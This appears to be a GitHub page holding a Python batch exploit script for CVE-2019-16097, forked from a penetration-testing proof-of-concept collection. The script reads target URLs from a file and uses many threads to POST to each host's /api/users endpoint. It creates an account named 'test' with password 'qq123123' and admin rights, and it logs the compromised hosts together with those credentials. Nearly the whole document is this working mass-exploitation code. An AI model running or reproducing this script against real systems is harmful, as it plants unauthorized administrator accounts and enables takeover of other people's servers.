forked from p1and/Penetration_Testing_POC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcve-2019-16097-batch-py3.py
49 lines (41 loc) · 1.47 KB
/
cve-2019-16097-batch-py3.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:rocky
# datetime:2019-09-21 00:43
# software: PyCharm
import requests
import logging
import threading
__author__ = 'rocky'
__date__ = '2019/9/21'
def poc(url):
bug_url = url + "/api/users"
payload = '{"username":"test","email":"[email protected]","realname":"test","password":"qq123123","comment":"1","has_admin_role":true}'
header = {"Content-Type": "application/json", "Accept": "application/json"}
try:
r = requests.post(bug_url, data=payload, headers=header, timeout=10)
print(bug_url)
print(r.status_code)
if r.status_code == 201:
print("[!] This URL is Vulnerable !")
print("[!] username: test password: qq123123")
f.write(
url +
"[!] This URL is Vulnerable ! [!] username: test password: qq123123 "
+ "\n")
else:
print("[-] It's nothing.")
except Exception as e:
logging.warning(bug_url)
print(e)
if __name__ == '__main__':
print("CVE-2019-16097-batch")
print("author: " + __author__)
print("date: " + __date__)
f = open("result.txt", "a")
url_list = [i.replace("\n", "") for i in open("url.txt", "r").readlines()]
for url in url_list:
threading.Thread(target=poc, args=(url, )).start()
while 1:
if (len(threading.enumerate()) < 50):
break